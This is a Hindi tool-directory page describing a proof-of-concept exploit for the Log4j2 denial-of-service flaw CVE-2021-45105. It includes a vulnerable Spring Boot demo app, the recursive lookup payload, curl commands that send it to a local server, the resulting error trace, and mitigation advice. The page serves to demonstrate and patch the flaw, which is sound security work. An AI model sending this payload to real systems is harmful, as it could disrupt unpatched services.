Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4j_dos_CVE-2021-45105 — CVE-2021-45105 (Log4j2 DOS) के लिए PoC एक्सप्लॉइट, Spring Boot वेब ऐप के साथ, विशेष रूप से तैयार किए गए HTTP हेडर/बॉडी पेलोड के माध्यम से अनंत लूप का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/cckuailong/log4j_dos_cve-2021-45105
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubcckuailong/log4j_dos_cve-2021-45105

Log4j_dos_CVE-2021-45105

CVE-2021-45105 (Log4j2 DOS) के लिए PoC एक्सप्लॉइट, Spring Boot वेब ऐप के साथ, विशेष रूप से तैयार किए गए HTTP हेडर/बॉडी पेलोड के माध्यम से अनंत लूप का प्रदर्शन करता है।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
1314 साल पहलेअभी तक समीक्षित नहीं
साझा करें

Log4j2 DOS (CVE-2021-45105)

Poc

root@kitploit:~
${${::-${::-$${::-$}}}}

प्रभावित संस्करण: 2.0-beta9 से 2.16.0 तक के सभी संस्करण

यह एप्लिकेशन Spring Boot वेब एप्लिकेशन पर आधारित है जो CVE-2021-45105 के प्रति संवेदनशील है।

यह Log4j 2.16.0 का उपयोग करता है।

एप्लिकेशन चलाना

इसे चलाएँ:

root@kitploit:~
Import the project in Java IDE as a maven project

Run CVEMainApplication.java as a spring boot app.

शोषण के चरण

  • फिर, एक्सप्लॉइट को इस प्रकार ट्रिगर करें:
root@kitploit:~
For GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${${::-${::-$${::-$}}}}'


For Post request ->
curl --location --request POST 'http://127.0.0.1:8080/addrecord' \
--header 'Content-Type: application/json' \
--data '{
	"clientRef": "${${::-${::-$${::-$}}}}"
}'
  • ध्यान दें कि आउटपुट अनंत लूप दिखाता है, हालाँकि परीक्षण में यह नहीं पाया गया कि यह DOS संसाधन-खपत वाला है, क्योंकि यह अनंत लूप प्रोग्राम द्वारा पहचाना गया और त्रुटि के साथ समाप्त हुआ:
root@kitploit:~

 ${ctx:apiVersion} ${ctx:clientRef}2021-12-18 14:29:56,759 http-nio-8080-exec-1 ERROR An exception occurred processing Appender Console java.lang.IllegalStateException: Infinite loop in property interpolation of ::-${::-$${::-j}}: :
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.checkCyclicSubstitution(StrSubstitutor.java:1081)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1029)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1042)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)
	

शमन:

Java 8 (या बाद के) उपयोगकर्ताओं को रिलीज़ 2.17.0 में अपग्रेड करना चाहिए।

वैकल्पिक रूप से, इसे कॉन्फ़िगरेशन में कम किया जा सकता है:

लॉगिंग कॉन्फ़िगरेशन में PatternLayout में, ${ctx:loginId} या $${ctx:loginId} जैसे Context Lookups को Thread Context Map पैटर्न (%X, %mdc, या %MDC) से बदलें। अन्यथा, कॉन्फ़िगरेशन में, ${ctx:loginId} या $${ctx:loginId} जैसे Context Lookups के संदर्भ हटा दें, जहाँ वे एप्लिकेशन के बाहरी स्रोतों जैसे HTTP हेडर या उपयोगकर्ता इनपुट से उत्पन्न होते हैं।

संदर्भ

https://issues.apache.org/jira/browse/LOG4J2-3230

टूल डाउनलोड करें